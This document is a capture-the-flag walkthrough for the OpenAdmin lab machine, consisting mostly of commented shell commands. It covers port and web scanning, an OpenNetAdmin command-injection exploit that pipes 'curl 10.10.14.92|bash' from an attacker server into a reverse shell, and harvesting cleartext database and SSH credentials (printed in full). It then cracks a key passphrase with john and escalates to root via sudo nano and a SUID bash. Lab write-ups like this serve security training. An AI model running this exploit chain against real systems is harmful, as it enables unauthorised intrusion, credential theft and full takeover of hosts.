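# Initial recon against the target.
# Each nmap run now writes to its own -oA basename: the original used
# "openadmin" for both the vuln-script scan and the default-script scan, so
# the second run silently overwrote the first's .nmap/.gnmap/.xml output.
# --script=vuln combined with --min-rate=10000 is very noisy and can
# destabilise fragile services; only run it where that is acceptable.
nmap -A -p- -oA openadmin-vuln 10.129.247.237 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default scripts (-sC), service/version detection (-sV), OS guess (-O),
# all TCP ports.
nmap -sC -sV -O -p- -oA openadmin 10.129.247.237

# Full UDP sweep. Without any rate option this takes a very long time —
# UDP scanning depends on ICMP unreachable replies, which hosts rate-limit.
nmap -sU -O -p- -oA openadmin-udp 10.129.247.237

# Generic web-server checks against port 80.
nikto -h 10.129.247.237:80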

Pasted image 20210816133925.png

# Focused re-scan of the web ports only; -sCV is shorthand for -sC -sV
# (default scripts + version detection). Normal output saved to "targeted".
nmap -sCV -p80,443 10.129.247.237 -oN targeted

Pasted image 20211103072824.png

# Fingerprint the web stack (server banner, frameworks, CMS hints).
whatweb http://10.129.247.237

Pasted image 20211103072915.png

# Directory brute force; --hc=404 hides not-found responses so only hits
# are shown. 200 concurrent connections is aggressive — lower -t against
# anything that is not a lab box. This is where /artwork and /music
# (used below) come from.
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.247.237/FUZZ

Pasted image 20211103073758.png

http://10.129.247.237/artwork

Pasted image 20211103073838.png

http://10.129.247.237/music y le damos click a login

Pasted image 20211103074059.png

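# Look up public exploits for OpenNetAdmin (presumably the app behind the
# login page reached from /music — see the screenshot above).
# The original search term "poennetadmin" was a typo and returns nothing.
searchsploit opennetadmin

# Mirror (-m) the chosen entry into the current directory by its EDB-ID,
# taken from the searchsploit listing.
searchsploit -m 47691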

Pasted image 20211103074307.png

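# Attacker side first, each in its own terminal: both must be listening
# BEFORE the curl below is sent, otherwise the target's "curl ... | bash"
# gets nothing and the callback is lost.
# NOTE(review): "curl 10.10.14.92|bash" fetches "/". python's http.server
# only returns a file for "/" if index.html exists in the cwd (otherwise it
# returns a directory listing, which bash cannot run) — so the payload
# presumably lives in index.html and calls back to 10.10.14.92:443 to match
# the listener below. Confirm before firing.
python3 -m http.server 80

nc -lvnp 443

# Trigger the OpenNetAdmin RCE: the injected value in xajaxargs[] ends the
# intended "ip=>" argument with ";" and appends echo/curl|bash. BEGIN/END
# only bracket the output so it is easy to spot in the response.
# URL scheme fixed: the original "http:10.129.247.237/ona" lacks "//" —
# curl happens to be lenient about that, but most other tools are not.
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";curl 10.10.14.92|bash;echo \"END\"&xajaxargs[]=ping" "http://10.129.247.237/ona"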

Pasted image 20211103080315.png

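# Post-exploitation from the shell obtained above. The cwd of a reverse
# shell is whatever the web process was running in, so search from /
# explicitly instead of relying on find's implicit "." (the original
# "find \-name" only escaped the dash; it searched the current dir).
find / -name user.txt 2>/dev/null

# OpenNetAdmin's install directory.
cd /opt/ona/www

# Hunt for config files — these commonly carry credentials (see next step).
find . -type f 2>/dev/null | grep "config"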

Pasted image 20211103080928.png

# Database settings for the app; contains the DB password in cleartext
# (screenshot). Treat this output as sensitive — it is reused as an OS
# password below.
cat ./local/config/database_settings.inc.php

Pasted image 20211103081035.png

credenciales jimmy:n1nj4W4rri)R!

# The DB password from database_settings.inc.php also works for the local
# user jimmy — password reuse between a service account and an OS account.
su jimmy

# Inspect the internal web app's main.php (directory not shown here —
# presumably the one jimmy can read; confirm with the screenshot).
cat main.php

# Internal service on 52846 — reached via localhost, so it is presumably
# bound to loopback and only accessible from the box itself. Its response
# contains a private SSH key (screenshot).
curl localhost:52846/main.php

Pasted image 20211103082314.png

Copiamos la llave privada de la respuesta y la guardamos en un fichero id_rsa

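# Convert the recovered (passphrase-protected) SSH private key into a
# john-crackable hash. The original ran ssh2john twice — once only to
# stdout, once redirected; a single redirected run is all that is needed.
/usr/share/john/ssh2john.py id_rsa > hash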

Pasted image 20211103084146.png

credenciales joanna:bloodninjas

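# Crack the key passphrase with rockyou. If the run is repeated john only
# says "No password hashes left to crack"; --show reprints the result from
# the pot file.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash

# ssh refuses a private key that is readable by group/others.
chmod 600 id_rsa

# Username fixed: the account is "joanna" (the original had "joana", which
# would be rejected). The passphrase is the one john recovered above.
ssh -i id_rsa joanna@10.129.247.237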

Pasted image 20211103084403.png

# List what joanna may run via sudo; from the next command it evidently
# allows nano on /opt/priv as root (screenshot).
sudo -l

# Run the permitted editor as root; nano's "execute command" feature
# (Ctrl+R, then Ctrl+X) gives arbitrary command execution as root.
sudo -u root nano /opt/priv

Pasted image 20211103084811.png

Dentro de nano: Ctrl+R (Read File) y después Ctrl+X (Execute Command); nano muestra el prompt «Command to execute», que se ejecuta con los privilegios de nano (root).

Pasted image 20211103085137.png

En nano ejecutamos chmod 4755 /bin/bash. Esto deja /bin/bash con el bit SUID de root: al terminar hay que revertirlo (chmod 0755 /bin/bash) para no dejar una shell root accesible a cualquier usuario.

Pasted image 20211103085429.png

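# -p makes bash keep the effective uid (root) granted by the setuid bit
# instead of dropping it to the real uid.
bash -p

# Cleanup when done: drop the setuid bit again so the box is not left with
# a root shell executable by any local user.
chmod 0755 /bin/bash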

Pasted image 20211103085654.png

boxes

copyright©2022 Cu3rv0x all rights reserved